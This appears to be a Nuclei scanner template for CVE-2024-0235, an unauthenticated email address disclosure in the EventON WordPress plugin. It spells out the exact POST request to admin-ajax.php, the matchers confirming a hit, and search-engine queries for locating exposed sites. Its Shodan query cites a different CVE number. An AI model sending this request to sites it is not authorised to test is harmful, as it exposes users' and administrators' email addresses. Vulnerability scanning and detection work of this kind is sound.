nuclei-templates/http/cves/2024/CVE-2024-0235.yaml

55 lines
1.7 KiB
YAML
Raw Normal View History

2024-04-28 06:04:28 +00:00
id: CVE-2024-0235
info:
2024-04-28 09:17:42 +00:00
name: EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Email Address Disclosure
2024-04-28 06:04:28 +00:00
author: princechaddha
severity: medium
2024-04-28 09:17:42 +00:00
description: |
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
2024-04-28 06:04:28 +00:00
impact: |
An attacker could potentially access sensitive email information.
remediation: |
Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
reference:
- https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-0235
cwe-id: CWE-862
epss-score: 0.00052
2024-04-28 09:17:42 +00:00
epss-percentile: 0.19233
2024-04-28 06:04:28 +00:00
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
metadata:
vendor: myeventon
product: eventon
framework: wordpress
shodan-query: vuln:CVE-2023-2796
fofa-query: wp-content/plugins/eventon/
2024-04-28 09:17:42 +00:00
publicwww-query: "wp-content/plugins/eventon/"
tags: cve,cve2024,wp,wordpress,unauth,exposure,eventon,wpscan
2024-04-28 06:04:28 +00:00
http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"
headers:
Content-Type: application/x-www-form-urlencoded
body: "_user_role=administrator"
2024-04-28 09:17:42 +00:00
matchers-condition: and
2024-04-28 06:04:28 +00:00
matchers:
- type: word
words:
2024-04-28 09:17:42 +00:00
- '@'
- '"status":'
- '"content":'
2024-04-28 06:04:28 +00:00
part: body
2024-04-28 09:17:42 +00:00
- type: status
status:
- 200